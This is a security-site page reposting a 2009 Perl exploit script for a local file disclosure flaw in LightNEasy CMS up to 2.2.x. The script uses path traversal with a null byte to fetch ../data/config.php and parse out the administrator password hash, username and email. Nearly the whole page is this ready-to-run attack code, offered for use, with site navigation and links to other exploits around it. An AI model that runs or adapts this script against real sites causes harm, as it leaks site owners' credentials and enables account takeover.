首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-06-11  

#!/usr/bin/perl
#
# LightNEasy sql/no-db <= 2.2.x system config disclosure exploit
#
# by staker
# ------------------------------
# mail: staker[at]hotmail[dot]it
# url: http://www.lightneasy.org
# ------------------------------

# it works with magic_quotes_gpc=off
#
# short explanation:
#
# -----------------------------------------------------
# LightNEasy contains one flaw that allows an attacker
# to disclose a local file because of file_get_contents
# it's possible to retrieve the configuration file
# passing as argument '../data/config.php'. Example:
# http://[host]/LightNEasy.php?page=../data/config.php
# ----------------------------------------------------
# Today is: 09 June 2009
# Location: Italy,Turin.
# http://www.youtube.com/watch?v=uXN0pE2Hdt8
# ----------------------------------------------------

use IO::Socket;


my $domain = $ARGV[0] || &usage;


launch_cmd("../data/config.php"); # if you wanna disclose another file,change it


sub launch_cmd()
{
      my ($data,$result,$html);
     
      my $page = $_[0] || die $!;
      my $path = socket_url($domain,'path');  
      my $host = socket_url($domain,'host');
     
      my $TCP = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp',
                                     ) || die $!;
                                    
      $data .= "GET /$path/LightNEasy.php?page=$page%00 HTTP/1.1\r\n";
      $data .= "Host: $host\r\n";
      $data .= "User-Agent: Lynx (textmode)\r\n";
      $data .= "Connection: close\r\n\r\n";
     
      $TCP->send($data);
     
      while (<$TCP>) {
            $html .= $_;
      }               
     
      if ($html =~ /password']="([0-9a-f]{40})"/i) {
            $result .= "Password: $1\n";
      }     
      if ($html =~ /fromname']="(.+?)"/i) {
            $result .= "Username: $1\n";
      }     
      if ($html =~ /toemail']="(.+?)"/i) {
            $result .= "E-Mail: $1\n";
      }     
                 
      print $result;
}                                   
                                           

sub socket_url()
{
           my ($url,$ext) = @_;
      
           $url =~ s/http:\/\/// if $url =~ /^http:\/\/(.+?)+$/i;
            
           @GLOBALS = split /\//,$url;
      
           if ($ext eq 'host') {
                return $GLOBALS[0];
           }    
           elsif ($ext eq 'path') {
                return $GLOBALS[1];
           }
           else {
                return join('/',@GLOBALS);   
           }
}


sub parse_url
{
        my $string = shift @_ || die($!);
       
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
       
        return $string;
}   


sub usage()
{
       print  "[*------------------------------------------------------------*]\n".
              "[* LightNEasy sql/no-db < 2.2.x sys config disclosure exploit *]\n".
              "[*------------------------------------------------------------*]\n".
              "[* Usage: perl light.pl [domain]                              *]\n".
              "[* [domain] domain -> http://localhost/lightneasy             *]\n".
              "[*------------------------------------------------------------*]\n";
      exit;
}  


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DX Studio Player < 3.0.29.1 Fi
·Open Biller 0.1 (username) Bli
·Denial of service exploit for
·phpMyAdmin (/scripts/setup.php
·phpMyAdmin /scripts/setup.php
·Joomla Component com_vehiclema
·Joomla Component com_realestat
·Sniggabo CMS (article.php id)
·MRCGIGUY Hot Links (report.php
·MRCGIGUY The Ticket System 2.0
·Sniggabo CMS (article.php id)
·Free Download Manager 2.5/3.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved